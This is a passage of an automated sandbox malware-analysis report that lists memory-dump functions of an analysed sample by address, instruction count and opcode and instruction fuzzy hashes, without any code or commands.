                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB4841D7 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c42f005a5e2b4ea0c189f23e1128e36d75eda27358733bb79d9c8bcd10d77f19
                                                                      • Instruction ID: d0f65597c493fdbe28449df1972448c5bf490bb7a031a9bf00cc0cca93e753da
                                                                      • Opcode Fuzzy Hash: c42f005a5e2b4ea0c189f23e1128e36d75eda27358733bb79d9c8bcd10d77f19
                                                                      • Instruction Fuzzy Hash: E7E0E631E095198BDB50EB54C8446F93365E7A53A0F118271D41DA71F5D9386D5487D0
                                                                      Function 00007FFAAB4789C0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB4727E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB4725E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB83BAFE Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 101ea88d369c3cd91e69ed8676ad5f8897cec43e2bda51a6f85d6636a88d4449
                                                                      • Instruction ID: 940ec0b7ae28f04f8773f69d44590a6bffb6071e454866aa1487b76b2bc61238
                                                                      • Opcode Fuzzy Hash: 101ea88d369c3cd91e69ed8676ad5f8897cec43e2bda51a6f85d6636a88d4449
                                                                      • Instruction Fuzzy Hash: 16D05BD1B1E6468BE258A72C911277C6596AF893C0F1444F9E00DC32D7CC1D3844D1C2
                                                                      Function 00007FFAAB477700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 097c72fa5e49c4a95ac1e1f9c995a91fde8d094d0cd5c3ed92f52ea13d8ce6a2
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: F5D01234B619044F870CA739885987477D1EB6A216B9540A9D00AC76B1D96ADC99C781
                                                                      Function 00007FFAAB440B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Function 00007FFAAB47BFE0 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c1a758f150fc2b79703c7aad2c6fc985d6c9c2f902c28e44796667bb046df95
                                                                      • Instruction ID: 734b1d3e66b3e354188730dffee20e2d5f87b5277ed4ebb623852f4b7dfcc4c5
                                                                      • Opcode Fuzzy Hash: 9c1a758f150fc2b79703c7aad2c6fc985d6c9c2f902c28e44796667bb046df95
                                                                      • Instruction Fuzzy Hash: 8FC08030511C084F870CE724C458C6473D0FB19201BC100D4D00FC7170D9559CD8CB81
                                                                      Function 00007FFAAB4406A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Function 00007FFAAB83BAF1 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 937d56a89ca170a6539d7ea9c5191ef4c4fb9fe8be4095d784d3842dca5f7191
                                                                      • Instruction ID: 9e0f7031cfde61dbef77359d5f062157b942c5e95817bc8e5c87d67e26459af6
                                                                      • Opcode Fuzzy Hash: 937d56a89ca170a6539d7ea9c5191ef4c4fb9fe8be4095d784d3842dca5f7191
                                                                      • Instruction Fuzzy Hash: ACD0C931149809CF8B84EB19C054D6433A1EB5938032180A4D00FC72F1DA25E855DB50
                                                                      Function 00007FFAAB4412B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB832CCB Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a5043e52b65a0f9b6c6423224325c59dbc22fcb2386c15bace55414dbc24798
                                                                      • Instruction ID: ea05384b1d45f79f34d3ae902d5cfd69cd925ff26daf31083495a12545ea994e
                                                                      • Opcode Fuzzy Hash: 4a5043e52b65a0f9b6c6423224325c59dbc22fcb2386c15bace55414dbc24798
                                                                      • Instruction Fuzzy Hash: 54D0C914A1F557C5F1784F09446127951947F0B381F28C4BEC07F418F2CD1C744A6281
                                                                      Function 00007FFAAB443416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48f4f5111794584fcde3a5e8a3274244d6c5c7124cab573755c597ed6fded9e2
                                                                      • Instruction ID: 8544362d18456b3f6c717ffecfe2fa96a4a5488589b719c4e3accacad045f3ba
                                                                      • Opcode Fuzzy Hash: 48f4f5111794584fcde3a5e8a3274244d6c5c7124cab573755c597ed6fded9e2
                                                                      • Instruction Fuzzy Hash: 2EC04C52F59D6697F2597628C42167F0856DF84658F9444B4E00EC73D6DD0C9B1112C6
                                                                      Function 00007FFAAB961D5B Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2656233662.00007FFAAB960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab960000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b000e5459ec46fc552a6e7e87cd68d5d8cf07ad722df81874c6b05a150cba2f
                                                                      • Instruction ID: 10b52abff86a53b981a8b4b2cb3fd8cb5ba4ecf22f98aaea54d3dd68db2b64dc
                                                                      • Opcode Fuzzy Hash: 2b000e5459ec46fc552a6e7e87cd68d5d8cf07ad722df81874c6b05a150cba2f
                                                                      • Instruction Fuzzy Hash: 02B09231446509CBD658A7A8B0410A03661AB4A21979125A8E00D8A2A6CA6BACE78784
                                                                      Function 00007FFAAB83722F Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0511c00046cd78565544cd89eb027ea0736e200201f3d3ad77b1928229fa64b
                                                                      • Instruction ID: b516cd8db13572dd537768e610eb83fc1ce37000f5c687d36d98c8e72f210e90
                                                                      • Opcode Fuzzy Hash: b0511c00046cd78565544cd89eb027ea0736e200201f3d3ad77b1928229fa64b
                                                                      • Instruction Fuzzy Hash: 39C04C45E0E283D7E6211268049147D16800B1B28075555B5D10E461E3D85CB8495295
                                                                      Function 00007FFAAB443A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Function 00007FFAAB4406C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3
                                                                      Function 00007FFAAB483DD0 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52c9ddaf208fff53ee9796a7c55b462e5761300fb97544581cd716c51e9562a2
                                                                      • Instruction ID: dd001c852b7743acf01ead4c05198b5d67f563924579e14bb72a22c0b9d1013e
                                                                      • Opcode Fuzzy Hash: 52c9ddaf208fff53ee9796a7c55b462e5761300fb97544581cd716c51e9562a2
                                                                      • Instruction Fuzzy Hash: BFB01201C9740701980436B51C4247470106B46180FC44870E81C402869C4D10990192
                                                                      Function 00007FFAAB483DC0 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62b97987db2caf57f37ff8684e5c26434e459e4a1f6875a8e970df1f793bdeac
                                                                      • Instruction ID: a7e4542a65e6f70c925b200ef0091148c204e36ad237dc434f19a99b1977df96
                                                                      • Opcode Fuzzy Hash: 62b97987db2caf57f37ff8684e5c26434e459e4a1f6875a8e970df1f793bdeac
                                                                      • Instruction Fuzzy Hash: E4B01210C5B40A42D42433FE09430B470409B46294FC14070D42C40092984D109D01C2

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4409B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5
                                                                      Function 00007FFAAB48AA00 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $r63$r63$r63
                                                                      • API String ID: 0-1891216863
                                                                      • Opcode ID: 9415e914db2f474bb48bb11ab78b75fa58098b8d90b838b74f689305fe401b99
                                                                      • Instruction ID: 074dbce7f839c99f22a9a69b5783a4ebcfb8e31a5309e836ab70ab4048ea2ee0
                                                                      • Opcode Fuzzy Hash: 9415e914db2f474bb48bb11ab78b75fa58098b8d90b838b74f689305fe401b99
                                                                      • Instruction Fuzzy Hash: C3217B62A0C94A4BF71CAB64C4197BA72D5EB62350F40C27EE05FC31D3ED6D680646C1
                                                                      Function 00007FFAAB96486F Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2656233662.00007FFAAB960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab960000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $#$-$3
                                                                      • API String ID: 0-426809724
                                                                      • Opcode ID: e12c0980f613db4d370f180f2619a1107b2694de91ed9fd3a2bec4a5f83b00a7
                                                                      • Instruction ID: baad1cd26396f38689e6caba248cc4b0091e8778fb5b6deda95317b223483864
                                                                      • Opcode Fuzzy Hash: e12c0980f613db4d370f180f2619a1107b2694de91ed9fd3a2bec4a5f83b00a7
                                                                      • Instruction Fuzzy Hash: A511563481D215CBEB199A44D4933B4B3D4FB45740F208179CCBE426D2FA3979AA46C7

                                                                      Executed Functions

                                                                      Function 00007FFAAB470D4C Relevance: 6.5, Strings: 5, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5X_H$b43$r63$r63
                                                                      • API String ID: 0-1044410338
                                                                      • Opcode ID: d5e9c42409e43e8c84c7ef602d023257c69b878cd186c6e57c3fe2ad35987aa9
                                                                      • Instruction ID: ed7a7846dba452c8fb36e5063d5b472e5d972b1eb628506d54a5a4574eba0b43
                                                                      • Opcode Fuzzy Hash: d5e9c42409e43e8c84c7ef602d023257c69b878cd186c6e57c3fe2ad35987aa9
                                                                      • Instruction Fuzzy Hash: 609117B6A0AA898FE749DF68C8657AD7FE1FB96350F4440AEC04DD73E2CA781444C780
                                                                      Function 00007FFAAB4708D0 Relevance: .2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ef1e98d9b68ba7d4c37c89a7eedbc49a8fadbcf2018b3c8db06b890da914462
                                                                      • Instruction ID: e137d068d438d23d02ae6facc2f6a5a2fc83b20d9fd53ce8c84dddd3961a9d3b
                                                                      • Opcode Fuzzy Hash: 3ef1e98d9b68ba7d4c37c89a7eedbc49a8fadbcf2018b3c8db06b890da914462
                                                                      • Instruction Fuzzy Hash: D4413E3264C9155FD715EB7CE4899F87BE0EF86321B0509BBD08ACB067DA20AC82C3C1
                                                                      Function 00007FFAAB47090D Relevance: .1, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7377bf824f7d7d600c6bb71e168f34228cfdd9576695743491d482e75cf294d
                                                                      • Instruction ID: 8567c3a51acda24a9c6413c6800aa3f616dbba89d0a8f802a1c3da3c0adf63bf
                                                                      • Opcode Fuzzy Hash: c7377bf824f7d7d600c6bb71e168f34228cfdd9576695743491d482e75cf294d
                                                                      • Instruction Fuzzy Hash: CA413652A4E6962FE705B77CE05A5F87BD0EF86361B1548FAD04EC71B3CD186882C2C4
                                                                      Function 00007FFAAB470998 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96db699d66a13112004949870e6c0974d9d65f54357d61c80f5d8964d7c00f62
                                                                      • Instruction ID: afdc9b056d2e32c278ef4d02a94240d82f1ccc4a072ecb1b305ed12ab2e7ace6
                                                                      • Opcode Fuzzy Hash: 96db699d66a13112004949870e6c0974d9d65f54357d61c80f5d8964d7c00f62
                                                                      • Instruction Fuzzy Hash: 8C31E360A1AA595FE788F778845AAB977D2EB99350F1440BDE40EC33E3DD18A8818381
                                                                      Function 00007FFAAB470908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e260b63e56fe282def90286e67da9b823a762b0a3d5e372c506b7ae2221df911
                                                                      • Instruction ID: 2f108efce297fe2c2bc39ef8334c547788e254aae91e9cfa00527482bc055ed3
                                                                      • Opcode Fuzzy Hash: e260b63e56fe282def90286e67da9b823a762b0a3d5e372c506b7ae2221df911
                                                                      • Instruction Fuzzy Hash: 6521F83130DC184FE768EB0CE889DB973D5EB5A32170101BAE58EC7136E921EC9287C1
                                                                      Function 00007FFAAB470960 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3652baa7d94f1bbbd050287839fa1a7106e7ef2ee2196f3b2ba9f9cac29c6fd
                                                                      • Instruction ID: 6f35d3d336e17c704b4b7fc2b19d49438189f8245d1b89a239e1d44fe3632f12
                                                                      • Opcode Fuzzy Hash: f3652baa7d94f1bbbd050287839fa1a7106e7ef2ee2196f3b2ba9f9cac29c6fd
                                                                      • Instruction Fuzzy Hash: 5C312452A0EA962FF354B37CE44A9B867D1EF85361B1444FED00EC32E3CC186C8682C4
                                                                      Function 00007FFAAB47116D Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 361e2c19dccd268f1f21c511a62512f339bbc453ec5b8a89727d09f04d7570e0
                                                                      • Instruction ID: 8a432c8eb09ece7235e0c88127dbc08ab1d32e293aa98bb3eef88ec15f0cde00
                                                                      • Opcode Fuzzy Hash: 361e2c19dccd268f1f21c511a62512f339bbc453ec5b8a89727d09f04d7570e0
                                                                      • Instruction Fuzzy Hash: E531077190E64ACFEB45EB68C8559BD7BF0FF5A300B0445FED00DD71A2EA28A885C781
                                                                      Function 00007FFAAB470C25 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000018.00000002.1651735559.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_24_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
